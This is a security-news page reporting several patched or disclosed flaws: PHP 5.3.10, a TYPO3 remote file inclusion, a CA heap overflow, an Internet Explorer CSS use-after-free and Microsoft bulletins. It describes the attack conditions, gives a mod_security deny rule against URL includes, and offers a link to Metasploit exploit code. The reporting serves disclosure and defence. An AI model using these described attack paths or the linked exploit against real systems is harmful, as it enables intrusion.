October 22, 2016

PHP 5.3.10 Fixes Critical Security Vulnerability

(LiveHacking.Com) – The PHP development team have released PHP 5.3.10 to fix a recently discovered remote code execution vulnerability. The vulnerability is a result of the hash table collisions CPU usage denial-of-service fix which was added to 5.3.9. For that fix the maximum possible number of input parameters was limited to 1000, but because of a bug in the implementation a remote attacker could send a large number of specially crafted POST requests, which could crash PHP or allow arbitrary code execution.

PHP 5.3.9 was released just over two weeks ago with over 90 bug fixes, some of which were security related. Among them was a fix for the hash table collisions problem that affected all the popular Web programming languages (including PHP, ASP.NET, Ruby and Python). At the end of last year, Alexander Klink and Julian Wälde revealed that many programming languages use hash tables while parsing POST forms to make them easily accessible by application developers. The algorithmic complexity of inserting n elements into the table then goes to O(n**2), making it possible to exhaust hours of CPU time using a single HTTP request. So it is possible for an attacker to send a small number of specially crafted posts to a server, causing high CPU utilization and creating a denial of service condition. PHP 5.3.10 fixes the fix for the fix!

The new version of PHP can be downloaded  here and it is recommended that all users to upgrade to the new version. The different Linux distributions have started to update their repositories:

Critical Vulnerability is TYPO3-Core; Remote Code Execution

(LiveHacking.Com) – The TYPO3 development team has issued a warning about a critical vulnerability in the TYPO3 content management system.

According to TYPO3 security bulletins, a crafted request to a vulnerable TYPO3 installation will allow an attacker to load PHP code from an external source and to execute it on the TYPO3 installation. The security issue is due to insufficient validation of the AbstractController.php file’s BACK_PATH parameter that leads to remote code execution.

With reference to the TYPO3 security advisory, a vulnerable system will meet all the the following conditions:

  1. TYPO3 version 4.5.0 up to 4.5.8, 4.6.0 or 4.6.1 (+ development releases of 4.7 branch).
  2. The following PHP configuration variables set to “on”: register_globals (“off” by default, advised to be “off” in TYPO3SecurityGuide), allow_url_include (“off” by default) and allow_url_fopen (“on” by default)

The following solutions have been advised by the TYPO3 security advisory:

  1. Update to the TYPO3 version 4.5.9 or 4.6.2 that fixes the problem described.
  2. Set at least one of following PHP configuration variables to “off”: register_globals, allow_url_include and allow_url_fopen.
  3. Apply the securitypatch.
  4. Set up a mod_security rule: SecRule ARGS:BACK_PATH “^(https?|ftp)” “deny”.

Please view the TYPO3 security advisory for more information.

Critical Vulnerability in CA Gateway Security 8.1 and CA Total Defense r12

(LiveHacking.Com) — CA Technology is warning its customers for a critical vulnerability in its Gateway Security 8.1 and CA Total Defense r12. The vulnerability can allow a remote attacker to execute arbitrary code.Critical Vulnerability in CA Gateway Security 8.1 and CA Total Defense r12

According to the CA portal, the vulnerability, CVE-2011-2667, occurs due to insufficient bounds checking that can result in a memory overwrite on the heap. By sending a malformed request, an attacker can overwrite a sensitive portion of heap memory, which can potentially result in server compromise.

The “Heap Memory” or “Heap Memory Pool” is an internal memory pool created at start-up that tasks use to dynamically allocate memory as needed. This memory pool is used by tasks that requires a lot of memory from the stack in the stack-based memory allocation system.

CA Technology has released an update to patch the vulnerability. Alternatively, update to Gateway Security 9.0 is available from the CA support site.

Critical Vulnerability in Internet Explorer

VUPEN, an IT security research company has reported a critical vulnerability in Internet Explorer that has been known for about two weeks.

security news at livehacking.com

With reference to VUPEN security advisory, a vulnerability has been identified in Microsoft Internet Explorer, which could be exploited by remote attackers to take complete control of a vulnerable system. This issue is caused by a use-after-free error within the “mshtml.dll” library when processing a web page referencing a CSS (Cascading Style Sheets) file that includes various “@import” rules, which could allow remote attackers to execute arbitrary code via a specially crafted web page.

VUPEN has confirmed this vulnerability with Microsoft Internet Explorer 8 on Windows 7, Windows Vista SP2 and Windows XP SP3, and with Internet Explorer 7 and 6 on Windows XP SP3. Microsoft has yet to respond and it is not know if or when a patch will be released.

Download Metasploit Framework exploit Code for this vulnerability here.

Security Updates for IE and Stuxnet Holes

Microsoft has released 17 security updates to close 40 security holes.

With reference to Microsoft Security Bulletins, this security update resolves four privately reported vulnerabilities and three publicly disclosed vulnerabilities in Internet Explorer. The most severe vulnerabilities could allow remote code execution if a user views a specially crafted Web page using Internet Explorer. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights.

Further, This security update is rated Critical for Internet Explorer 6, Internet Explorer 7, and Internet Explorer 8. The security update addresses the vulnerabilities by modifying the way that Internet Explorer handles objects in memory and script during certain processes. This security update also addresses the vulnerability first described in Microsoft Security Advisory 2458511.

More information is available here.

Source:[Microsoft Security Bulletin MS10-090]